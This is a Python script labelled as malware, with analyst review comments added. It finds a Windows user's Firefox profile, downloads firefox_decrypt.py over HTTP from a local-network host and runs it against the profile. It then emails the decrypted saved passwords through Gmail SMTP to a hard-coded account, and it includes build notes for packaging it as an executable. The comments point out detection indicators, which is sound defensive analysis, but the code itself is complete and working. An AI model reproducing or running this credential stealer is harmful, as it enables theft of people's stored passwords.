#!/usr/bin/env python3
# coding: cp850
"""
Malware - firefox_decrypt.py

Firefox Decrypt
https://github.com/unode/firefox_decrypt

The executable is built with pyinstaller, run like this:
pyinstaller --oneline malware.py

For the .exe to work, the password must be hard-coded instead of using dotenv.

Analyst summary (derived from the code in this file): the script resolves
the current Windows user, locates a Firefox profile directory, downloads a
copy of firefox_decrypt.py over plain HTTP, runs it against that profile and
e-mails the captured output through Gmail's SMTP-over-TLS endpoint.
"""
# NOTE(review): per the author's build note above, a packaged sample would
# carry the sending account's password inside the binary rather than in a
# .env file, so it should be recoverable during static analysis; confirm
# against the actual build.

import dotenv
import os
import requests
import subprocess
import sys
import smtplib
import tempfile
from email.mime.text import MIMEText


def run_command(command):
    """
    Run a command and return its output as text.

    The command string is passed to the system shell (shell=True). Output is
    decoded as cp850 and stripped of surrounding whitespace. Any exception is
    printed and turned into a None return value instead of propagating.
    """
    try:
        # shell=True means every call from this script appears in process
        # telemetry as a shell child of the script's own process.
        output_command = subprocess.check_output(command, shell=True)
        return output_command.decode('cp850').strip()
    except Exception as e:
        print(f"\n[!] Error al ejecutar el comando {command}.\nError: {e}")
        return None


def send_email(subject, body, sender, recipients, password):
    """
    Send an e-mail with the report of pressed keys.

    The wording above is the author's; in this file the only caller passes
    the decrypted Firefox passwords as the body. The message is plain text
    and is delivered through smtp.gmail.com on port 465 after logging in as
    the sender with the given password.
    """
    msg = MIMEText(body)
    msg['Subject'] = subject
    msg['From'] = sender
    msg['To'] = ', '.join(recipients)
    # Exfiltration channel: a TLS connection to smtp.gmail.com:465 opened by
    # the script itself. On a workstation, an SMTP session started by a
    # process that is not a mail client is a useful network detection point.
    with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp_server:
        smtp_server.login(sender, password)
        smtp_server.sendmail(sender, recipients, msg.as_string())
    print(f"[i] Email sent Successfully!\n")


def get_firefox_profiles(username):
    """
    Return the name of the first Firefox profile directory for a user.

    Lists the Profiles directory under the user's roaming AppData and keeps
    entries whose name contains "release". Returns the first match, or None
    when there is no match or the directory cannot be listed.
    """
    path = f"C:\\Users\\" + username + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles"
    try:
        # Directory enumeration of the Firefox Profiles folder by a
        # non-browser process is observable with file-access auditing.
        profiles = [profile for profile in os.listdir(
            path) if "release" in profile]
        return profiles[0] if profiles else None
    except Exception as e:
        print(f"\n[!] Error al obtener el profile de Firefox.\nError: {e}")
        return None


def get_firefox_passwords(username, profiles):
    """
    Download firefox_decrypt.py, run it on the profile and return its output.

    Despite the plural name, `profiles` is used as a single profile directory
    name when the command line is built. Returns whatever run_command returns
    for the tool invocation, which is None if that invocation failed.
    """
    # The tool is fetched over unencrypted HTTP from a hard-coded private-range
    # address, so the staging host is expected to sit on the same local
    # network. The response status is not checked and the content is not
    # verified before being written out and executed.
    r = requests.get("http://192.168.1.120/firefox_decrypt.py")
    # A new temporary directory is created and made the working directory.
    # Only the script file is deleted below; the directory itself is left
    # behind and the working directory is not restored.
    temp_dir = tempfile.mkdtemp()
    os.chdir(temp_dir)
    with open("firefox_decrypt.py", "wb") as f:
        f.write(r.content)
    # Runs the downloaded script with whichever `python` is on PATH, passing
    # the full profile path as its argument. A shell-spawned python process
    # with a Firefox profile path on its command line is a strong
    # process-creation indicator.
    # NOTE(review): a Firefox Primary Password should keep stored logins from
    # being decrypted from the profile files alone - confirm against the
    # upstream tool's behaviour.
    command = f"python firefox_decrypt.py C:\\Users\\{username}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\{profiles}"
    passwords = run_command(command)
    os.remove("firefox_decrypt.py")
    return passwords


if __name__ == '__main__':
    # `whoami` output is split on the backslash and the second part is taken
    # as the account name. If run_command returned None, or the output had no
    # backslash, this line raises before the check below is reached.
    username_str = run_command("whoami")
    username = username_str.split("\\")[1]
    profiles = get_firefox_profiles(username)
    if not username or not profiles:
        sys.exit(
            f"\n[!] No ha sido posible obtener el nombre de usuario o el profile válido de firefox")
    passwords = get_firefox_passwords(username, profiles)
    if passwords:
        # The SMTP password is read from the APP_PASSWD environment variable
        # after loading a .env file.
        dotenv.load_dotenv()
        app_passwd = os.getenv("APP_PASSWD")
        # Sender and recipient are the same hard-coded Gmail address; together
        # with the fixed subject line below it is an indicator that can be
        # searched for in mail and proxy logs.
        send_email(
            "Decrypted Firefox Passwords INFO",
            passwords,
            "keyloggerseginf@gmail.com",
            ["keyloggerseginf@gmail.com"],
            app_passwd
        )
    else:
        print(f"[!] No se han encontrado contraseñas")